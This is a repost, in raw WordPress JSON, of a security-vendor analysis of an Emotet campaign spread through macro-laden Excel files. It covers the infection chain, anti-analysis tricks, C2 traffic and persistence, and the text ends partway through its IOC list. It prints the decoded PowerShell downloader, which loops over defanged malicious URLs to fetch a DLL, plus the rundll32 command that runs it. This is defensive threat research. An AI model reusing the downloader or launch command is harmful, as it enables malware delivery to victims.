{"id":18440,"date":"2022-03-07T10:40:03","date_gmt":"2022-03-07T18:40:03","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2022\/03\/07\/news-12173\/"},"modified":"2022-03-07T10:40:03","modified_gmt":"2022-03-07T18:40:03","slug":"news-12173","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/03\/07\/news-12173\/","title":{"rendered":"MS Office Files Involved Again in Recent Emotet Trojan Campaign \u2013 Part I"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b>Affected platforms:<\/b> Microsoft Windows<br \/> <b>Impacted parties: <\/b>64-bit Windows Users<br \/> <b>Impact: <\/b>Controls victim\u2019s device and collects sensitive information<br \/> <b>Severity level: <\/b>Critical <\/p>\n<p>Recently, Fortinet\u2019s FortiGuard Labs captured more than 500 Microsoft Excel files that were involved in a campaign to deliver a fresh Emotet Trojan onto the victim\u2019s device.<\/p>\n<p>Emotet, known as a modular Trojan, was first discovered in the middle of 2014. Since then, it has become very active, continually updating itself. It has also been highlighted in cybersecurity news from time to time. Emotet uses social engineering, like email, to lure recipients into opening attached document files (including Word, Excel, PDF, etc.) or clicking links within the content of the email that download Emotet\u2019s latest variant onto the victim\u2019s device and then execute it.<\/p>\n<p>Our FortiGuard Labs team has monitored Emotet Trojan campaigns in the past and posted numerous <a href=\"https:\/\/www.fortinet.com\/blog\/search?q=Emotet\">technical analysis blogs<\/a>.<\/p>\n<p>This time, I grabbed an Excel file from the captured samples and conducted deep research on this campaign. In this part I of my analysis, you can expect to learn: how an Excel file is leveraged to spread Emotet, what anti-analysis techniques Emotet uses in this variant, how it maintains persistence on a victim\u2019s device, how this Emotet variant communicates with its C2 server, and how other modules are delivered, loaded, and executed on a victim\u2019s system.<\/p>\n<h2><b>Looking into the Excel File<\/b><\/h2>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image.img.png\/1646637764539\/img1.png\" alt=\"Exmaple of the Excel file opened in the MS Excel program\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1.1 \u2013 The Excel file is opened in the MS Excel program<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>I have set my Excel\u2019s macro option to &quot;Disable all macros with notification&quot; in &quot;Macro Settings.&quot; That\u2019s why it shows the yellow \u201cSecurity Warning\u201d bar when an opened Excel file contains a Macro, as shown in Figure 1.1. This image shows the fake message used to lure a victim into clicking the \u201cEnable Content\u201d button to view the protected content of the Excel file.<\/p>\n<p>The malicious Macro has a function called \u201cWorkbook_Open()\u201d that is executed automatically in the background when the Excel file opens. It calls other local functions to write data to two files: &quot;uidpjewl.bat&quot; and &quot;tjspowj.vbs&quot; in the \u201cC:ProgramData\u201d folder. The written data is read out from multiple cells of this Excel file. In the end, the Macro executes the &quot;tjspowj.vbs&quot; file with \u201cwscript.exe.\u201d Refer to Figure 1.2 for more information.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1333986966.img.png\/1646637804261\/img1.2.png\" alt=\"VBA code in Macro used to execute the extracted &#34;tjspowj.vbs&#34; file\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1.2 \u2013 VBA code in Macro used to execute the extracted &#34;tjspowj.vbs&#34; file<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2><b>VBS and PowerShell<\/b><\/h2>\n<p>The code in \u201ctjspowj.vbs\u201d is obfuscated. See Figure 2.1. The top part is the original code and the bottom part is the normalized code.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_771653274.img.png\/1646637835162\/img2.1.png\" alt=\" Figure 2.1 \u2013 VBS code in \u201ctjspowj.vbs\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 2.1 \u2013 VBS code in \u201ctjspowj.vbs\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--12 aem-GridColumn--offset--default--0\">\n<p>The code is very simple. It runs the early extracted \u201cuidpjewl.bat\u201d file, which downloads the Emotet payload file. \u201cuidpjewl.bat\u201d file is a DOS batch file containing the PowerShell code, which is encoded many times. To better understand its intention, I have decoded it below:<\/p>\n<p style=\"margin-left: 24.0px;\"><i><span style=\"background-color: rgb(217,217,217);\"><span style=\"color: black;\">$MJXdfshDrfGZses4=&quot;<\/span><span style=\"color: rgb(192,0,0);\">hxxps:\/\/youlanda[.]org\/eln-images\/n8DPZISf\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">hxxp:\/\/rosevideo[.]net\/eln-images\/EjdCoMlY8Gy\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">hxxp:\/\/vbaint[.]com\/eln-images\/H2pPGte8XzENC\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">hxxps:\/\/framemakers[.]us\/eln-images\/U5W2IGE9m8i9h9r\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">hxxp:\/\/niplaw[.]com\/asolidfoundation\/yCE9\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/robertmchilespe[.]com\/cgi\/3f\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/vocoptions[.]net\/cgi\/ifM9R5ylbVpM8hfR\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/missionnyc[.]org\/ fonts\/JO5\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/robertflood[.]us\/eln-images\/DGI2YOkSc99XPO\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/mpmcomputing[.]com\/fonts\/fJJrjqpIY3Bt3Q\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/dadsgetinthegame[.]com\/eln-images\/tAAUG\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/smbservices[.]net\/cgi\/JO01ckuwd\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/stkpointers[.]com\/eln-images\/D\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">hxxp:\/\/rosewoodcraft[.]com\/Merchant2\/5.00\/PGqX\/<\/span><span style=\"color: black;\">&quot;.sPLIt(&quot;,&quot;);<\/span><\/span><\/i><\/p>\n<p style=\"margin-left: 24.0px;\"><i><span style=\"background-color: rgb(217,217,217);\">foReACh($yIdsRhye34syufgxjcdf iN $MJXdfshDrfGZses4){<\/span><br \/>  <span style=\"background-color: rgb(217,217,217);\">$GweYH57sedswd=(&quot;<\/span><span style=\"color: rgb(231,76,60);\"><span style=\"background-color: rgb(217,217,217);\">c:programdatapuihoud.dll&quot;<\/span><\/span><span style=\"background-color: rgb(217,217,217);\">);<\/span><br \/>  <span style=\"background-color: rgb(217,217,217);\">invoke-webrequest -uri $yIdsRhye34syufgxjcdf -outfile $GweYH57sedswd;<\/span><br \/>  <span style=\"background-color: rgb(217,217,217);\">iF(test-path $GweYH57sedswd) {<\/span><br \/>  <span style=\"background-color: rgb(217,217,217);\">if((get-item $GweYH57sedswd).length -ge 47436) { break; }<\/span><br \/>  <span style=\"background-color: rgb(217,217,217);\">}<\/span><br \/>  <span style=\"background-color: rgb(217,217,217);\">}<\/span><\/i><\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>It tries to download Emotet (into a local file, &quot;c:programdatapuihoud.dll&quot;, that is hardcoded in the PowerShell) from a group of websites until any download is successfully completed.<\/p>\n<p>Meanwhile, the caller \u201ctjspowj.vbs\u201d file takes responsibility for running the downloaded Emotet with the command <span style=\"background-color: rgb(217,217,217);\">&quot;<\/span><i><span style=\"background-color: rgb(217,217,217);\">cmd \/c start \/B c:windowssyswow64rundll32.exe c:programdatapuihoud.dll,tjpleowdsyf<\/span><\/i><span style=\"background-color: rgb(217,217,217);\">&quot;<\/span>.<\/p>\n<p>\u201cC:WindowsSysWOW64\u201d is a system folder created by Microsoft for storing 32-bit files. \u201cWOW64\u201d is the x86 emulator that allows 32-bit Windows applications to run on 64-bit Windows. It only exists in 64-bit architecture Windows. In other words, although the downloaded Emotet file was compiled for 32-bit architecture, this variant only affects 64-bit Windows users. It terminates execution and pops up an error message when it runs on a 32-bit Windows because the file is not found.<\/p>\n<p>\u201crundll32.exe\u201d is a system file that loads and runs 32-bit dynamic-link library (DLL) files. It uses the command line syntax \u201crundll32.exe DLLname,&lt;Export Function&gt;\u201d, where the \u201cExport Function\u201d is optional. \u201cpuihoud.dll\u201d is the DLL name for this Emotet and the subsequent export function name (\u201ctjpleowdsyf\u201d) is a random string. In an analysis tool, I found it only has one export function, called \u201cDllRegisterServer()\u201d. Let\u2019s see what happens with a random export function.<\/p>\n<h2><b>Start Emotet in Rundll32<\/b><\/h2>\n<p>Once the Emotet file (\u201cpuihoud.dll\u201d) is loaded by \u201crundll32.exe\u201d, its entry point function is called the very first time. It then calls the DllMain() function where it loads and decrypts a 32-bit Dll into its memory from a \u201cResource\u201d named \u201cHITS\u201d. The decrypted Dll is the core of this Emotet, which will be referred to as \u201cX.dll\u201d in this analysis due to a hardcoded constant string in its code, as shown below.<\/p>\n<p style=\"margin-left: 40.0px;\"><span style=\"background-color: rgb(217,217,217);\">10024030 ; Export Ordinals Table for X.dll\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><\/p>\n<p style=\"margin-left: 40.0px;\"><span style=\"background-color: rgb(217,217,217);\">10024032 aX_dll\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 db\u00a0<\/span><span style=\"color: rgb(231,76,60);\"><b><span style=\"background-color: rgb(217,217,217);\">&#8216;X.dll&#8217;<\/span><\/b><\/span><span style=\"background-color: rgb(217,217,217);\">,0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><\/p>\n<p style=\"margin-left: 40.0px;\"><span style=\"background-color: rgb(217,217,217);\">10024038 aDllregisterser db &#8216;DllRegisterServer&#8217;,0<\/span><\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1566476672.img.png\/1646637870777\/img-3.1.png\" alt=\" Figure 3.1 \u2013 Decrypt function and the decrypted X.dll\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 3.1 \u2013 Decrypt function and the decrypted X.dll<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 3.1 shows the relevant functions used to decrypt and deploy the decrypted \u201cX.dll\u201d, which is in memory. The EntryPoint() function of \u201cX.dll\u201d is called after its deployment.<\/p>\n<p>\u201cX.dll\u201d checks if the export function name from the command line parameter is \u201cDllRegisterServer\u201d. If not, it runs the command line again with \u201cDllRegisterServer\u201d instead of the random string, like &quot;C:Windowssystem32rundll32.exe c:programdatapuihoud.dll,DllRegisterServer&quot; (see step 1 &amp; 2 in Figure 3.3). It then calls ExitProcess() to exit the first \u201crundll32.exe\u201d. In Figure 3.2 it is about to call the API CreateProcessW() to run the new command.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_504371653.img.png\/1646637901362\/mg3.2.png\" alt=\" Figure 3.2 \u2013 \u201cX.dll\u201d starts \u201cpuihoud.dll\u201d with \u201cDllRegisterServer\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 3.2 \u2013 \u201cX.dll\u201d starts \u201cpuihoud.dll\u201d with \u201cDllRegisterServer\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p class=\"cq-text-placeholder-ipe\" data-emptytext=\"Text\">\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1349875080.img.png\/1646637928217\/img3.3.png\" alt=\" Figure 3.3 \u2013 Work flow of Emotet to reach its core code\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 3.3 \u2013 Work flow of Emotet to reach its core code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>When Emotet is running with the \u201cDllRegisterServer\u201d export function, it will normally exit from X.dll\u2019s EntryPoint() as well as puihoud.dll\u2019s EntryPoint() (step 3 in Figure 3.3). Next, rundll32 calls the API GetProcAddress() to gather the export function \u201cDllRegisterServer\u201d from \u201cpuihoud.dll\u201d and call it. Finally, puihoud.dll!DllRegisterServer calls X.dll! DllRegisterServer() (step 4 in Figure 3.3).<\/p>\n<p>This is also pretty much the way rundll32.exe loads and runs a dll file with an export function.<\/p>\n<p>X.dll!DllRegisterServer() is the real starting point for executing malicious things on the victim\u2019s device.<\/p>\n<h2><b>Anti-Analysis Techniques<\/b><\/h2>\n<p>To protect its code from being analyzed, Emotet uses anti-analysis techniques. In this section I will explain what kinds of such techniques this variant uses.<\/p>\n<ul>\n<li><b>Code Flow is Obfuscated<\/b><\/li>\n<\/ul>\n<p style=\"margin-left: 40.0px;\">In most functions, it mixes the code flow with lots of \u201cgoto\u201d statements. It has a local variable, called \u201cswitch_number\u201d by me, that holds a dynamic number to control how it executes the code.<\/p>\n<p style=\"margin-left: 40.0px;\">The logic is that all codes are enclosed in a \u201cwhile infinite loop\u201d statement, which determines which code flow to enter (\u201cgoto\u201d) according to the value of \u201cswitch_number\u201d. And \u201cswitch_number\u201d is modified each time after being used, then once the code branch task is finished it goes back to the \u201cwhile\u201d statement to check the \u201cswitch_number\u201d again.<\/p>\n<p style=\"margin-left: 40.0px;\">This technique really causes trouble for security researchers trying to analyze the function\u2019s intention and trace its code. Figure 4.1 is a pseudo code in C that reveals the obfuscated code flow.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1027523446.img.png\/1646637969637\/img4.1.png\" alt=\"Figure 4.1 \u2013 Pseudo code of obfuscated code flow\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.1 \u2013 Pseudo code of obfuscated code flow<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<ul>\n<li><b>Strings are Encrypted<\/b><\/li>\n<\/ul>\n<p style=\"margin-left: 40.0px;\">All constant strings are encrypted and are only decrypted just before being used. The constant strings are usually very useful hints for researchers to quickly locate the key point of the malware.<\/p>\n<ul>\n<li><b>Constant Numbers are Obfuscated<\/b><\/li>\n<\/ul>\n<p style=\"margin-left: 40.0px;\">Normally, the constant numbers are useful to researchers for guessing the code\u2019s purpose. Here is an example. The instruction \u201cmov [esp+2ACh+var_1A0], 2710h\u201d has been obfuscated, as seen in the three instructions below.<\/p>\n<p style=\"margin-left: 48.0px;\"><span style=\"font-size: 11.0pt;\"><span style=\"font-family: Calibri , sans-serif;\"><span style=\"font-size: 12.0pt;\"><span style=\"background-color: rgb(217,217,217);\"><span style=\"color: black;\">mov\u00a0\u00a0\u00a0\u00a0 [esp+2ACh+var_1A0], 387854h<\/span><\/span><\/span><\/span><\/span><\/p>\n<p style=\"margin-left: 48.0px;\"><span style=\"font-size: 11.0pt;\"><span style=\"font-family: Calibri , sans-serif;\"><span style=\"font-size: 12.0pt;\"><span style=\"background-color: rgb(217,217,217);\"><span style=\"color: black;\">or\u00a0\u00a0\u00a0\u00a0\u00a0 [esp+2ACh+var_1A0], 0F1FDFF8Dh<\/span><\/span><\/span><\/span><\/span><\/p>\n<p style=\"margin-left: 48.0px;\"><span style=\"font-size: 11.0pt;\"><span style=\"font-family: Calibri , sans-serif;\"><span style=\"font-size: 12.0pt;\"><span style=\"background-color: rgb(217,217,217);\"><span style=\"color: black;\">xor\u00a0\u00a0\u00a0\u00a0 [esp+2ACh+var_1A0], 0F1FDD8CDh<\/span><\/span><\/span><\/span><\/span><\/p>\n<ul>\n<li><b>All APIs are hidden<\/b><\/li>\n<\/ul>\n<p style=\"margin-left: 40.0px;\">The APIs are obtained using a hash code of both the API name and the module name that the function belongs to. Each time Emotet needs to call an API, it calls a local function to obtain it in the EAX register and then calls it. Figure 4.2 is an example of calling API GetCommandLineW(), where 0xB03E1C69 is the hash code of module \u201ckernel32\u201d and 0x4543B55E is the hash code of \u201cGetCommandLineW\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_2140278771.img.png\/1646638002656\/img4.2.png\" alt=\" Figure 4.2 \u2013 Getting the API GetCommandLineW() and invoking it\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 4.2 \u2013 Getting the API GetCommandLineW() and invoking it<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2><b>Communicating with the C2 Server<\/b><\/h2>\n<p>Once Emotet finishes collecting the basic information from the victim\u2019s device, it calls the API BCryptEncrypt() to encrypt the data. Let\u2019s look at the kind of data contained in the collected data, as shown in Figure 5.1.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1222524077.img.png\/1646638029053\/img5.1.png\" alt=\" Figure 5.1 \u2013 Collected basic data to encrypt\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 5.1 \u2013 Collected basic data to encrypt<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The 60H bytes data in memory is the plaintext data to be encrypted. Let me explain what most of the data is.<\/p>\n<p><b>0x20<\/b>, at offset+4, is the size of sha256 hash code followed, which includes the bytes starting from offset+8 to offset+0x27 (A0 C9 \u2026 68 F8). That is a sha256 hash code of the entire following data, starting at offset+28h.<\/p>\n<p><b>0x2C<\/b>, at offset+28h, is the size of the following data. The next <b>0x10<\/b> is the length of the victim\u2019s ID (\u201cBOBSXPC_9C09B592\u201d), which is a combination of the computer name and the system driver\u2019s volume number. To obtain this information, Emotet calls APIs like GetComputerName(), GetWindowsDirectoryW(), and GetVolumeInformationW().<\/p>\n<p>The following dword <b>0x29C220DD<\/b> is a hash code of Emotet Dll\u2019s full path. <b>0x13465AA<\/b> is a constant value defined in its code. It may be a malware ID of this Emotet. <b>0x2710<\/b> is another constant value, and I suppose it is a sort of version of this variant. <b>0x19E7D<\/b> is a combination of the victim\u2019s system information, including Windows version, architecture,\u00a0and so on. To get this information it needs to call APIs RtlGetVersion() and GetNativeSystemInfo(). <b>0x01<\/b> at offset+50h is a current process ID (rundll32.exe) related value.<\/p>\n<p>The last data, starting at offset+58h, is meaningless padding (AB AB AB\u2026).<\/p>\n<p>The encrypted binary data will be converted into base64 string by calling the API CryptBinaryToStringW(). The base64 string is submitted to the C2 server as a \u201cCookies\u201d value in an HTTP Get request.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1403965020.img.png\/1646638059594\/img-5.2.png\" alt=\" Figure 5.2 \u2013 Sending encrypted data to C2 server\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 5.2 \u2013 Sending encrypted data to C2 server<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>In the example shown in Figure 5.2, as you may have noticed, the Cookie name and URL are randomized by Emotet to bypass the cybersecurity device\u2019s detection.<\/p>\n<p>In total, there are 49 C2 servers (IP address and port) hardcoded and encrypted within this variant. Please refer to the \u201cC2 Server List\u201d under the \u201cIOCs\u201d section for all the IP addresses and ports.<\/p>\n<p>The C2 server detects the submitted data to determine next steps, including replying with Emotet modules and commands for further actions.<\/p>\n<p>The replied data is encrypted binary data in the HTTP response body. In Figure 5.3, below, the marked box is an example of the data just after decryption.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_2100567127.img.png\/1646638087553\/img-5.3.png\" alt=\" Figure 5.3 \u2013 The decrypted C2 response data\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 5.3 \u2013 The decrypted C2 response data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The decrypted data is 60H long and contains both verification data and control data.<\/p>\n<p><b>0x40<\/b> at the beginning is the size of the verification data, the signature data (31 1B \u2026 3C 6D), which is a\u00a0signed hash of the control data. The received data must pass verification, otherwise it drops the packet. The control data starts from offset+54H to the end. <b>0x8<\/b> is the size of the following data. The control data in this packet is two dword numbers \u2014 0x00.<\/p>\n<p>The first 0x00 is a flag that can be 0, 1, or 8.<\/p>\n<p>If the flag is 8, Emotet will uninstall itself from the victim\u2019s device, including removing the auto-run item from system registry, deleting the file(s) or folder(s) it created, as well as deleting the Emotet Dll file.<\/p>\n<p>If the flag is 0 and the second dword is not 0 (it should be the size of the attached module to this packet), it executes the module on the victim\u2019s device.<\/p>\n<p>If the flag is 1, it goes to the flag 0\u2019s branch. I\u2019ll explain this part in more detail in the next part of this analysis.<\/p>\n<h2><b>Relocate and Persistent<\/b><\/h2>\n<p>Once Emotet receives a valid response from the C2 server, it relocates the downloaded Emotet dll file from \u201cC:WindowsProgramDatapuihoud.dll\u201d (in my analysis environment) into the \u201c%LocalAppData%\u201d folder.\u00a0 Moreover, to remain in the victim\u2019s device, Emotet makes itself persistent by adding the relocated file into the auto-run group in the system registry. Emotet is then able to run at system startup. Figure 6.1 is a screenshot of the Registry Editor displaying the auto-run item in the system registry.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1967749716.img.png\/1646638117446\/img-6.1.png\" alt=\" Figure 6.1 \u2013 Added auto-run item in the system registry.\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 6.1 \u2013 Added auto-run item in the system registry.<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2><b>Conclusion<\/b><\/h2>\n<p>In this post we have walked through the malicious Macro within a captured Excel file, which downloads Emotet via two extracted files, &quot;uidpjewl.bat&quot; and &quot;tjspowj.vbs&quot;.<\/p>\n<p>We then went through how the downloaded Emotet Dll file is run in a rundll32.exe process as well as how it extracts the Emotet core X.dll from its \u201cResource\u201d.<\/p>\n<p>I also explained what kinds of anti-analysis techniques this Emotet uses to protect its code from being analyzed.<\/p>\n<p>And finally, I elaborated on what kind of data Emotet collects from the victim\u2019s system and how the binary data is encrypted and converted into base64 string and finally submitted to its C2 server via an HTTP packet.<\/p>\n<p>In the next part of this analysis, I will focus on those returned modules from Emotet\u2019s C2 server and how they are executed by Emotet, as well as what sensitive data they are able to steal from the victim\u2019s device.<\/p>\n<p>Please stay tuned.<\/p>\n<h2><b>Fortinet Protections<\/b><\/h2>\n<p>Fortinet customers are already protected from this malware by FortiGuard\u2019s Web Filtering, AntiVirus, FortiMail, FortiClient, FortiEDR, and CDR (content disarm and reconstruction) services, as follows:<\/p>\n<p>The malicious Macro inside the Excel sample can be disarmed by the FortiGuard CDR (content disarm and reconstruction) service.<\/p>\n<p>All relevant URLs have been rated as &quot;<b>Malicious Websites<\/b>&quot; by the FortiGuard Web Filtering service.<\/p>\n<p>The captured\u00a0Excel sample and the downloaded Emotet dll file are detected as &quot;<b>VBA\/Emotet.2826!tr.dldr<\/b> &quot; and &quot;<b> W32\/Emotet.B185!tr<\/b>&quot; and are blocked by the FortiGuard AntiVirus service.<b><\/b><\/p>\n<p>FortiEDR detects both the Excel file and Emotet dll file as malicious based on its behavior.<\/p>\n<p>In addition to these protections, we suggest that organizations have their end users also go through the\u00a0FREE\u00a0<a href=\"https:\/\/training.fortinet.com\/?utm_source=blog&amp;utm_campaign=nse-institute\">NSE training<\/a>:\u00a0<a href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=nse_1&amp;utm_source=blog&amp;utm_campaign=nse-1\">NSE 1 \u2013 Information Security Awareness<\/a>. It includes a module on Internet threats that is designed to help end users learn how to identify and protect themselves from phishing attacks.<\/p>\n<h2><b>IOCs<\/b><\/h2>\n<h4><b>URLs Involved in the Campaign:<\/b><\/h4>\n<p>&quot;hxxps[:]\/\/youlanda[.]org\/eln-images\/n8DPZISf\/&quot;<br \/> &quot;hxxp[:]\/\/rosevideo[.]net\/eln-images\/EjdCoMlY8Gy\/&quot;<br \/> &quot;hxxp[:]\/\/vbaint[.]com\/eln-images\/H2pPGte8XzENC\/&quot;<br \/> &quot;hxxps[:]\/\/framemakers[.]us\/eln-images\/U5W2IGE9m8i9h9r\/&quot;<br \/> &quot;hxxp[:]\/\/niplaw[.]com\/asolidfoundation\/yCE9\/&quot;<br \/> &quot;hxxp[:]\/\/robertmchilespe[.]com\/cgi\/3f\/&quot;<br \/> &quot;hxxp[:]\/\/vocoptions[.]net\/cgi\/ifM9R5ylbVpM8hfR\/&quot;<br \/> &quot;hxxp[:]\/\/missionnyc[.]org\/fonts\/JO5\/&quot;<br \/> 